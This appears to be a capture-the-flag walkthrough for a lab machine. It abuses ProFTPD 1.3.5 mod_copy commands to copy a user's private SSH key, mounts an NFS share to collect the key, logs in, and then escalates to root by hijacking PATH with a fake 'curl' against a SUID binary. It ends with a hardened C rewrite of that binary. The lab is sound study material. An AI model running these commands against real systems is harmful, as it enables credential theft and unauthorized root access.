1. ProFTPD 1.3.5 is vulnerable because:
The mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.
2. nc 1.2.3.4 21
3. SITE CPFR /home/kenobi/.ssh/id_rsa (Bizarre syntax, I know)
– Identifies the file to be copied
4. SITE CPTO /var/tmp/id_rsa
– Copies the file; the server replies: 250 copy successful
5. Mount remote dir with NFS
mkdir /mnt/kenobiNFS
mount machine_ip:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
6. Copy id_rsa to the local machine, then SSH in with it.
7. ssh -i id_rsa kenobi@1.2.3.4
$foothold
8. Find SUID files: find / -perm -u=s -type f 2>/dev/null
9. Reveals many SUID files, one of which is /usr/bin/menu
10. Run strings /usr/bin/menu, which shows us:
curl -I localhost
uname -r
ifconfig
This shows us the binary calls these commands without a full path (e.g. curl rather than /usr/bin/curl, uname rather than /usr/bin/uname).
As this file runs with the root user's privileges, we can manipulate our PATH to get root.
echo /bin/sh >curl
chmod +x curl
export PATH=/tmp:$PATH
/usr/bin/menu
Enter your choice: 1
# cat /root/root.txt to get the string for points
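For contrast, here is what a hardened version of a menu-style SUID helper looks like, as an added example (not the binary from the machine): every command is an absolute path run through execve() with a fixed environment, so the caller's PATH is never searched and the relative-path hijack above does not work. The three menu entries mirror the commands seen in the strings output; is_trusted_path, menu_command and run_choice are hypothetical names.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
/* Hypothetical hardened rewrite of the "menu" SUID helper (added example).
 * Fixes the PATH hijack above: commands are absolute paths run via execve()
 * with a fixed environment, so the caller's PATH is never searched. */

static const char *const TRUSTED_ENV = "PATH=/usr/sbin:/usr/bin:/sbin:/bin";
/* argv for each menu choice (the three commands seen in the strings output). */
static char *const MENU[][4] = {
    {"/usr/bin/curl", "-I", "localhost", NULL},
    {"/bin/uname", "-r", NULL},
    {"/sbin/ifconfig", NULL},
};
#define MENU_LEN (sizeof MENU / sizeof MENU[0])

/* Returns 1 if p is an absolute path with no ".." component, else 0. */
int is_trusted_path(const char *p) {
    return p != NULL && p[0] == '/' && strstr(p, "..") == NULL;
}
/* argv for a 1-based choice, or NULL if out of range or path not trusted. */
char *const *menu_command(int choice) {
    if (choice < 1 || (size_t)choice > MENU_LEN) return NULL;
    char *const *argv = MENU[choice - 1];
    return is_trusted_path(argv[0]) ? argv : NULL;
}

/* Runs the chosen command in a child with TRUSTED_ENV as its only environment.
 * Returns the child's exit status, or -1 on bad choice / fork / abnormal exit. */
int run_choice(int choice) {
    char *const *argv = menu_command(choice);
    if (argv == NULL) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const envp[] = {(char *)TRUSTED_ENV, NULL};
        execve(argv[0], argv, envp);   /* no PATH lookup, no /bin/sh -c */
        _exit(127);                    /* only reached if execve() fails */
    }
    int status = 0; if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    int choice = 0;
    printf("Enter your choice: ");
    return scanf("%d", &choice) == 1 && run_choice(choice) == 0 ? 0 : 1;
}
```

Auditing existing SUID binaries for the same weakness comes down to the check the writeup already performs: strings output containing bare command names (curl, uname, ifconfig) rather than absolute paths.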

By Greg Miller

Ex-military cyber officer. Triathlete and mountain bike racer.